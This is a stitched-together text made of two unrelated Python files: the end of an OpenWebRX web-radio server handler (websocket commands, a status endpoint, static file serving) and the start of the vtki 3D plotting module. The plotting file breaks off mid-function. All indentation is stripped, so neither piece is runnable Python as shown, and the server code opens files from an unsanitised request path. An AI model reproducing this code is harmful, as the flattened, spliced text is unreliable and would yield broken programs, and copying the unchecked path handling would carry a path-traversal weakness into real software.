secondary_spectrum_data=dsp.read_secondary_fft(dsp.get_secondary_fft_bytes_to_read())
if len(secondary_spectrum_data) == 0: break
# print "len(secondary_spectrum_data)", len(secondary_spectrum_data) #TODO digimodes
rxws.send(self, secondary_spectrum_data, "FFTS")
except: break
myclient.loopstat=42
while True:
try:
myclient.loopstat=422
secondary_demod_data=dsp.read_secondary_demod(1)
myclient.loopstat=423
if len(secondary_demod_data) == 0: break
# print "len(secondary_demod_data)", len(secondary_demod_data), secondary_demod_data #TODO digimodes
rxws.send(self, secondary_demod_data, "DAT ")
except: break
# ========= process commands =========
while True:
myclient.loopstat=50
rdata=rxws.recv(self, False)
myclient.loopstat=51
#try:
if not rdata: break
elif rdata[:3]=="SET":
print "[openwebrx-httpd:ws,%d] command: %s"%(client_i,rdata)
pairs=rdata[4:].split(" ")
bpf_set=False
new_bpf=dsp.get_bpf()
filter_limit=dsp.get_output_rate()/2
for pair in pairs:
param_name, param_value = pair.split("=")
if param_name == "low_cut" and -filter_limit <= int(param_value) <= filter_limit:
bpf_set=True
new_bpf[0]=int(param_value)
elif param_name == "high_cut" and -filter_limit <= int(param_value) <= filter_limit:
bpf_set=True
new_bpf[1]=int(param_value)
elif param_name == "offset_freq" and -cfg.samp_rate/2 <= int(param_value) <= cfg.samp_rate/2:
myclient.loopstat=510
dsp.set_offset_freq(int(param_value))
elif param_name == "squelch_level" and float(param_value) >= 0:
myclient.loopstat=520
dsp.set_squelch_level(float(param_value))
elif param_name=="mod":
if (dsp.get_demodulator()!=param_value):
myclient.loopstat=530
if dsp_initialized: dsp.stop()
dsp.set_demodulator(param_value)
if dsp_initialized: dsp.start()
elif param_name == "output_rate":
if not dsp_initialized:
myclient.loopstat=540
dsp.set_output_rate(int(param_value))
myclient.loopstat=541
dsp.set_samp_rate(cfg.samp_rate)
elif param_name=="action" and param_value=="start":
if not dsp_initialized:
myclient.loopstat=550
dsp.start()
dsp_initialized=True
elif param_name=="secondary_mod" and cfg.digimodes_enable:
if (dsp.get_secondary_demodulator() != param_value):
if dsp_initialized: dsp.stop()
if param_value == "off":
dsp.set_secondary_demodulator(None)
do_secondary_demod = False
else:
dsp.set_secondary_demodulator(param_value)
do_secondary_demod = True
rxws.send(self, "MSG secondary_fft_size={0} if_samp_rate={1} secondary_bw={2} secondary_setup".format(cfg.digimodes_fft_size, dsp.if_samp_rate(), dsp.secondary_bw()))
if dsp_initialized: dsp.start()
elif param_name=="secondary_offset_freq" and 0 <= int(param_value) <= dsp.if_samp_rate()/2 and cfg.digimodes_enable:
dsp.set_secondary_offset_freq(int(param_value))
else:
print "[openwebrx-httpd:ws] invalid parameter"
if bpf_set:
myclient.loopstat=560
dsp.set_bpf(*new_bpf)
#code.interact(local=locals())
except:
myclient.loopstat=990
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd:ws] exception: ",exc_type,exc_value
traceback.print_tb(exc_traceback) #TODO digimodes
#if exc_value[0]==32: #"broken pipe", client disconnected
# pass
#elif exc_value[0]==11: #"resource unavailable" on recv, client disconnected
# pass
#else:
# print "[openwebrx-httpd] error in /ws/ handler: ",exc_type,exc_value
# traceback.print_tb(exc_traceback)
#stop dsp for the disconnected client
myclient.loopstat=991
try:
dsp.stop()
del dsp
except:
print "[openwebrx-httpd] error in dsp.stop()"
#delete disconnected client
myclient.loopstat=992
try:
cma("do_GET /ws/ delete disconnected")
id_to_close=get_client_by_id(myclient.id,False)
close_client(id_to_close,False)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd] client cannot be closed: ",exc_type,exc_value
traceback.print_tb(exc_traceback)
finally:
cmr()
myclient.loopstat=1000
return
elif self.path in ("/status", "/status/"):
#self.send_header('Content-type','text/plain')
getbands=lambda: str(int(cfg.shown_center_freq-cfg.samp_rate/2))+"-"+str(int(cfg.shown_center_freq+cfg.samp_rate/2))
self.wfile.write("status="+("inactive" if receiver_failed else "active")+"\nname="+cfg.receiver_name+"\nsdr_hw="+cfg.receiver_device+"\nop_email="+cfg.receiver_admin+"\nbands="+getbands()+"\nusers="+str(len(clients))+"\nusers_max="+str(cfg.max_clients)+"\navatar_ctime="+avatar_ctime+"\ngps="+str(cfg.receiver_gps)+"\nasl="+str(cfg.receiver_asl)+"\nloc="+cfg.receiver_location+"\nsw_version="+sw_version+"\nantenna="+cfg.receiver_ant+"\n")
print "[openwebrx-httpd] GET /status/ from",self.client_address[0]
else:
f=open(rootdir+self.path)
data=f.read()
extension=self.path[(len(self.path)-4):len(self.path)]
extension=extension[2:] if extension[1]=='.' else extension[1:]
checkresult=check_server()
if extension == "wrx" and (checkresult or receiver_failed):
self.send_302("inactive.html")
return
anyStringsPresentInUserAgent=lambda a: reduce(lambda x,y:x or y, map(lambda b:self.headers['user-agent'].count(b), a), False)
if extension == "wrx" and ( (not anyStringsPresentInUserAgent(("Chrome","Firefox","Googlebot","iPhone","iPad","iPod"))) if 'user-agent' in self.headers.keys() else True ) and (not request_param.count("unsupported")):
self.send_302("upgrade.html")
return
if extension == "wrx":
cleanup_clients(False)
if cfg.max_clients<=len(clients):
self.send_302("retry.html")
return
self.send_response(200)
if(("wrx","html","htm").count(extension)):
self.send_header('Content-type','text/html')
elif(extension=="js"):
self.send_header('Content-type','text/javascript')
elif(extension=="css"):
self.send_header('Content-type','text/css')
self.end_headers()
if extension == "wrx":
replace_dictionary=(
("%[RX_PHOTO_DESC]",cfg.photo_desc),
("%[CLIENT_ID]", generate_client_id(self.client_address[0])) if "%[CLIENT_ID]" in data else "",
("%[WS_URL]","ws://"+cfg.server_hostname+":"+str(cfg.web_port)+"/ws/"),
("%[RX_TITLE]",cfg.receiver_name),
("%[RX_LOC]",cfg.receiver_location),
("%[RX_QRA]",cfg.receiver_qra),
("%[RX_ASL]",str(cfg.receiver_asl)),
("%[RX_GPS]",str(cfg.receiver_gps[0])+","+str(cfg.receiver_gps[1])),
("%[RX_PHOTO_HEIGHT]",str(cfg.photo_height)),("%[RX_PHOTO_TITLE]",cfg.photo_title),
("%[RX_ADMIN]",cfg.receiver_admin),
("%[RX_ANT]",cfg.receiver_ant),
("%[RX_DEVICE]",cfg.receiver_device),
("%[AUDIO_BUFSIZE]",str(cfg.client_audio_buffer_size)),
("%[START_OFFSET_FREQ]",str(cfg.start_freq-cfg.center_freq)),
("%[START_MOD]",cfg.start_mod),
("%[WATERFALL_COLORS]",cfg.waterfall_colors),
("%[WATERFALL_MIN_LEVEL]",str(cfg.waterfall_min_level)),
("%[WATERFALL_MAX_LEVEL]",str(cfg.waterfall_max_level)),
("%[WATERFALL_AUTO_LEVEL_MARGIN]","[%d,%d]"%cfg.waterfall_auto_level_margin),
("%[DIGIMODES_ENABLE]",("true" if cfg.digimodes_enable else "false")),
("%[MATHBOX_WATERFALL_FRES]",str(cfg.mathbox_waterfall_frequency_resolution)),
("%[MATHBOX_WATERFALL_THIST]",str(cfg.mathbox_waterfall_history_length)),
("%[MATHBOX_WATERFALL_COLORS]",cfg.mathbox_waterfall_colors)
)
for rule in replace_dictionary:
while data.find(rule[0])!=-1:
data=data.replace(rule[0],rule[1])
self.wfile.write(data)
f.close()
return
except IOError:
self.send_error(404, 'Invalid path.')
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "[openwebrx-httpd] error (@outside):", exc_type, exc_value
traceback.print_tb(exc_traceback)
class ClientNotFoundException(Exception):
pass
last_worktime=0
last_idletime=0
def get_cpu_usage():
global last_worktime, last_idletime
try:
f=open("/proc/stat","r")
except:
return 0 #Workaround, possibly we're on a Mac
line=""
while not "cpu " in line: line=f.readline()
f.close()
spl=line.split(" ")
worktime=int(spl[2])+int(spl[3])+int(spl[4])
idletime=int(spl[5])
dworktime=(worktime-last_worktime)
didletime=(idletime-last_idletime)
rate=float(dworktime)/(didletime+dworktime)
last_worktime=worktime
last_idletime=idletime
if(last_worktime==0): return 0
return rate
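# --- Added note (illustration only, not part of the original file) ---
# get_cpu_usage() returns busy/(busy+idle) computed from the deltas of the
# aggregate "cpu " line of /proc/stat between two consecutive calls
# (busy = user + nice + system). Where /proc/stat is unavailable (e.g. macOS)
# it reports 0.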
if __name__=="__main__":
main()
|
plotting.py
|
"""
vtki plotting module
"""
import collections
import ctypes
import logging
import os
import time
from threading import Thread
from subprocess import PIPE, Popen
import imageio
import numpy as np
import vtk
from vtk.util import numpy_support as VN
import vtki
from vtki.export import export_plotter_vtkjs
from vtki.utilities import (get_scalar, is_vtki_obj, numpy_to_texture, wrap,
_raise_not_matching)
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters"""
for key, p in _ALL_PLOTTERS.items():
p.close()
_ALL_PLOTTERS.clear()
return True
MAX_N_COLOR_BARS = 10
PV_BACKGROUND = [82/255., 87/255., 110/255.]
FONT_KEYS = {'arial': vtk.VTK_ARIAL,
'courier': vtk.VTK_COURIER,
'times': vtk.VTK_TIMES}
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
rcParams = {
'background' : [0.3, 0.3, 0.3],
'camera' : {
'position' : [1, 1, 1],
'viewup' : [0, 0, 1],
},
'window_size' : [1024, 768],
'font' : {
'family' : 'courier',
'size' : 12,
'title_size': None,
'label_size' : None,
'color' : [1, 1, 1],
'fmt' : None,
},
'cmap' : 'jet',
'color' : 'white',
'nan_color' : 'darkgray',
'outline_color' : 'white',
'colorbar_orientation' : 'horizontal',
'colorbar_horizontal' : {
'width' : 0.60,
'height' : 0.08,
'position_x' : 0.35,
'position_y' : 0.02,
},
'colorbar_vertical' : {
'width' : 0.1,
'height' : 0.8,
'position_x' : 0.85,
'position_y' : 0.1,
},
'show_scalar_bar' : True,
'show_edges' : False,
'lighting' : True,
'interactive' : False,
'render_points_as_spheres' : False,
'use_panel' : True,
}
DEFAULT_THEME = dict(rcParams)
def set_plot_theme(theme):
"""Set the plotting parameters to a predefined theme"""
if theme.lower() in ['paraview', 'pv']:
rcParams['background'] = PV_BACKGROUND
rcParams['cmap'] = 'coolwarm'
rcParams['font']['family'] = 'arial'
rcParams['font']['label_size'] = 16
rcParams['show_edges'] = False
elif theme.lower() in ['document', 'doc', 'paper', 'report']:
rcParams['background'] = 'white'
rcParams['cmap'] = 'viridis'
rcParams['font']['size'] = 18
rcParams['font']['title_size'] = 18
rcParams['font']['label_size'] = 18
rcParams['font']['color'] = 'black'
rcParams['show_edges'] = False
rcParams['color'] = 'tan'
rcParams['outline_color'] = 'black'
elif theme.lower() in ['night', 'dark']:
rcParams['background'] = 'black'
rcParams['cmap'] = 'viridis'
rcParams['font']['color'] = 'white'
rcParams['show_edges'] = False
rcParams['color'] = 'tan'
rcParams['outline_color'] = 'white'
elif theme.lower() in ['default']:
for k,v in DEFAULT_THEME.items():
rcParams[k] = v
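# Minimal usage sketch for set_plot_theme() (assuming, as with the other
# helpers in this module, that it is re-exported at the vtki package level):
#
#   import vtki
#   vtki.set_plot_theme('document')  # white background, viridis, larger fonts
#   ...                              # build plots here
#   vtki.set_plot_theme('default')   # restore the values saved in DEFAULT_THEME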
def run_from_ipython():
""" returns True when run from IPython """
try:
py = __IPYTHON__
return True
except NameError:
return False
def opacity_transfer_function(key, n_colors):
"""Get the opacity transfer function results: range from 0 to 255
"""
transfer_func = {
'linear': np.linspace(0, 255, n_colors, dtype=np.uint8),
'linear_r': np.linspace(0, 255, n_colors, dtype=np.uint8)[::-1],
'geom': np.geomspace(1e-6, 255, n_colors, dtype=np.uint8),
'geom_r': np.geomspace(255, 1e-6, n_colors, dtype=np.uint8),
}
try:
return transfer_func[key]
except KeyError:
raise KeyError('opacity transfer function ({}) unknown.'.format(key))
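# Example of the mapping above (an illustration, not part of the public API):
#
#   opacity_transfer_function('linear', 5)    # -> array([  0,  63, 127, 191, 255], dtype=uint8)
#   opacity_transfer_function('linear_r', 5)  # -> the same ramp, reversed
#
# add_mesh() below consults this table when ``opacity`` is given as one of the
# string keys ('linear', 'linear_r', 'geom', 'geom_r').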
def plot(var_item, off_screen=None, full_screen=False, screenshot=None,
interactive=True, cpos=None, window_size=None,
show_bounds=False, show_axes=True, notebook=None, background=None,
text='', return_img=False, eye_dome_lighting=False, use_panel=None,
**kwargs):
"""
Convenience plotting function for a vtk or numpy object.
Parameters
----------
var_item : vtk or numpy object
VTK object or numpy array to be plotted.
off_screen : bool
Plots off screen when True. Helpful for saving screenshots
without a window popping up.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores window_size.
Default False.
screenshot : str or bool, optional
Saves screenshot to file when enabled. See:
help(vtkinterface.Plotter.screenshot). Default disabled.
When True, takes screenshot and returns numpy array of image.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
show_bounds : bool, optional
Shows mesh bounds when True. Default False. Alias ``show_grid`` also
accepted.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active.
show_axes : bool, optional
Shows a vtk axes widget. Enabled by default.
text : str, optional
Adds text at the bottom of the plot.
**kwargs : optional keyword arguments
See help(Plotter.add_mesh) for additional options.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Returned only when screenshot enabled
"""
if notebook is None:
if run_from_ipython():
try:
notebook = type(get_ipython()).__module__.startswith('ipykernel.')
except NameError:
pass
if notebook:
off_screen = notebook
plotter = Plotter(off_screen=off_screen, notebook=notebook)
if show_axes:
plotter.add_axes()
plotter.set_background(background)
if isinstance(var_item, list):
if len(var_item) == 2: # might be arrows
isarr_0 = isinstance(var_item[0], np.ndarray)
isarr_1 = isinstance(var_item[1], np.ndarray)
if isarr_0 and isarr_1:
plotter.add_arrows(var_item[0], var_item[1])
else:
for item in var_item:
plotter.add_mesh(item, **kwargs)
else:
for item in var_item:
plotter.add_mesh(item, **kwargs)
else:
plotter.add_mesh(var_item, **kwargs)
if text:
plotter.add_text(text)
if show_bounds or kwargs.get('show_grid', False):
if kwargs.get('show_grid', False):
plotter.show_grid()
else:
plotter.show_bounds()
if cpos is None:
cpos = plotter.get_default_cam_pos()
plotter.camera_position = cpos
plotter.camera_set = False
else:
plotter.camera_position = cpos
if eye_dome_lighting:
plotter.enable_eye_dome_lighting()
result = plotter.show(window_size=window_size,
auto_close=False,
interactive=interactive,
full_screen=full_screen,
screenshot=screenshot,
return_img=return_img,
use_panel=use_panel)
# close and return camera position and maybe image
plotter.close()
# Result will be handled by plotter.show(): cpos or [cpos, img]
return result
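# Hedged usage sketch for the convenience function above:
#
#   import vtki
#   mesh = vtki.Sphere()
#   cpos = plot(mesh, color='tan', show_bounds=True, screenshot='sphere.png')
#   # cpos is the final camera position; with return_img=True the rendered
#   # image array is returned alongside it, as described in Returns above.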
def plot_arrows(cent, direction, **kwargs):
"""
Plots arrows as vectors
Parameters
----------
cent : np.ndarray
Accepts a single 3d point or array of 3d points.
direction : np.ndarray
Accepts a single 3d point or array of 3d vectors.
Must contain the same number of items as cent.
**kwargs : additional arguments, optional
See help(vtki.Plot)
Returns
-------
Same as Plot. See help(vtki.Plot)
"""
return plot([cent, direction], **kwargs)
def running_xserver():
"""
Check if x server is running
Returns
-------
running_xserver : bool
True when on Linux and running an X server. Returns False when
the ``xset`` query fails or is unavailable (e.g. on non-Linux platforms).
"""
try:
p = Popen(["xset", "-q"], stdout=PIPE, stderr=PIPE)
p.communicate()
return p.returncode == 0
except:
return False
class BasePlotter(object):
"""
To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
def __new__(cls, *args, **kwargs):
if cls is BasePlotter:
raise TypeError("vtki.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=1.0):
""" Initialize base plotter """
self.image_transparent_background = False
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self.renderers = []
self._active_renderer_index = 0
assert_str = '"shape" should be a list or tuple'
assert isinstance(shape, collections.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = vtki.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
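# Layout sketch (illustration only): for shape=(2, 2) the loops above hand
# each renderer a normalized (xmin, ymin, xmax, ymax) viewport, e.g. the
# first renderer created (i=1, j=0) gets SetViewport(0.0, 0.5, 0.5, 1.0),
# i.e. the top-left quarter of the window.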
# This is a private variable to keep track of how many colorbars exist
# This allows us to keep adding colorbars without overlapping
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
# This keeps track of scalar names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
self._actors = {}
# track if the camera has been setup
# self.camera_set = False
self.first_time = True
# Keep track of the scale
self._labels = []
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
def update_style(self):
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
""" sets the interactive style to trackball - the default syle """
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_image_style(self):
""" sets the interactive style to image
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
""" sets the interactive style to joystick
allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse is not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
""" sets the interactive style to rubber band zoom
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
""" sets the interactive style to terrain
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
""" sets the interactive style to rubber band picking
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def set_focus(self, point):
""" sets focus to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetFocalPoint(point)
self._render()
def set_position(self, point):
""" sets camera position to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetPosition(point)
self._render()
def set_viewup(self, vector):
""" sets camera viewup vector """
if isinstance(vector, np.ndarray):
if vector.ndim != 1:
vector = vector.ravel()
self.camera.SetViewUp(vector)
self._render()
def _render(self):
""" redraws render window if the render window exists """
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
self.render_trigger.emit()
elif not self.first_time:
self.render()
def add_axes(self, interactive=None, color=None):
""" Add an interactive axes widget """
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
self._update_axes_color(color)
return
self.axes_actor = vtk.vtkAxesActor()
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
# Set the color
self._update_axes_color(color)
def hide_axes(self):
"""Hide the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def key_press_event(self, obj, event):
""" Listens for key press event """
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
if key == 'q':
self.q_pressed = True
elif key == 'b':
self.observer = self.iren.AddObserver('LeftButtonPressEvent',
self.left_button_down)
elif key == 'v':
self.isometric_view_interactive()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click"""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def isometric_view_interactive(self):
""" sets the current interactive render window to isometric view """
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""
Update window, redraw, process messages query
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
rng=None, stitle=None, show_edges=None,
point_size=5.0, opacity=1.0, line_width=None,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=False, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None,
multi_colors=False, name=None, texture=None,
render_points_as_spheres=None,
render_lines_as_tubes=False, edge_color='black',
ambient=0.0, show_scalar_bar=None, nan_color=None,
nan_opacity=1.0, loc=None, backface_culling=False,
rgb=False, **kwargs):
"""
Adds a unstructured, structured, or surface mesh to the
plotting object.
Also accepts a 3D numpy.ndarray
Parameters
----------
mesh : vtk unstructured, structured, polymesh, or 3D numpy.ndarray
A vtk unstructured, structured, or polymesh to plot.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
Color will be overridden when scalars are input.
style : string, optional
Visualization style of the vtk mesh. One for the following:
style='surface'
style='wireframe'
style='points'
Defaults to 'surface'
scalars : numpy array, optional
Scalars used to "color" the mesh. Accepts an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
color and scalars are None, then the active scalars are
used
rng : 2 item list, optional
Range of mapper for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``clim``
is also an accepted alias for this.
stitle : string, optional
Scalar title. By default there is no scalar legend bar.
Setting this creates the legend bar and adds a title to
it. To create a bar with no title, use an empty string
(i.e. '').
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
point_size : float, optional
Point size. Applicable when style='points'. Default 5.0
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0.
A string option can also be specified to map the scalar range
to the opacity. Options are: linear, linear_r, geom, geom_r
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
flip_scalars : bool, optional
Flip direction of cmap.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Default
256.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalar display. Default
False
cmap : str, optional
cmap string. See available matplotlib cmaps. Only
applicable for when displaying scalars. Defaults None
(rainbow). Requires matplotlib.
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
ambient : float, optional
When lighting is enabled, this is the amount of light (from
0 to 1) that reaches the actor independently of the light
source, i.e. ambient lighting. Default 0.0.
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all NaN values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of NaN values. Should be between 0 and 1.
Default 1.0
backface_culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
rgb : bool, optional
If a 2 dimensional array is passed as the scalars, plot those
values as RGB+A colors! ``rgba`` is also accepted alias for this.
Returns
-------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# fixes lighting issue when using precalculated normals
if isinstance(mesh, vtk.vtkPolyData):
if mesh.GetPointData().HasArray('Normals'):
mesh.point_arrays['Normals'] = mesh.point_arrays.pop('Normals')
if scalar_bar_args is None:
scalar_bar_args = {}
if isinstance(mesh, np.ndarray):
mesh = vtki.PolyData(mesh)
style = 'points'
# Convert the VTK data object to a vtki wrapped object if necessary
if not is_vtki_obj(mesh):
mesh = wrap(mesh)
if show_edges is None:
show_edges = rcParams['show_edges']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
if rng is None:
rng = kwargs.get('clim', None)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if isinstance(mesh, vtki.MultiBlock):
self.remove_actor(name, reset_camera=reset_camera)
# first check the scalars
if rng is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalar specified
if isinstance(scalars, str):
rng = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('Scalar array must be given as a string name for multiblock datasets.')
if multi_colors:
# Compute unique colors for each index of the block
import matplotlib as mpl
from itertools import cycle
cycler = mpl.rcParams['axes.prop_cycle']
colors = cycle(cycler)
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_vtki_obj(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_vtki_obj(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None:
# Note that a block can exist but be None type
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_scalar(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
a = self.add_mesh(data, color=color, style=style,
scalars=ts, rng=rng, stitle=stitle,
show_edges=show_edges,
point_size=point_size, opacity=opacity,
line_width=line_width,
flip_scalars=flip_scalars,
lighting=lighting, n_colors=n_colors,
interpolate_before_map=interpolate_before_map,
cmap=cmap, label=label,
scalar_bar_args=scalar_bar_args,
reset_camera=reset_camera, name=next_name,
texture=None,
render_points_as_spheres=render_points_as_spheres,
render_lines_as_tubes=render_lines_as_tubes,
edge_color=edge_color,
show_scalar_bar=show_scalar_bar, nan_color=nan_color,
nan_opacity=nan_opacity,
loc=loc, rgb=rgb, **kwargs)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
if nan_color is None:
nan_color = rcParams['nan_color']
nanr, nang, nanb = parse_color(nan_color)
nan_color = nanr, nang, nanb, nan_opacity
if color is True:
color = rcParams['color']
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# set main values
self.mesh = mesh
self.mapper = vtk.vtkDataSetMapper()
self.mapper.SetInputData(self.mesh)
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling)
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
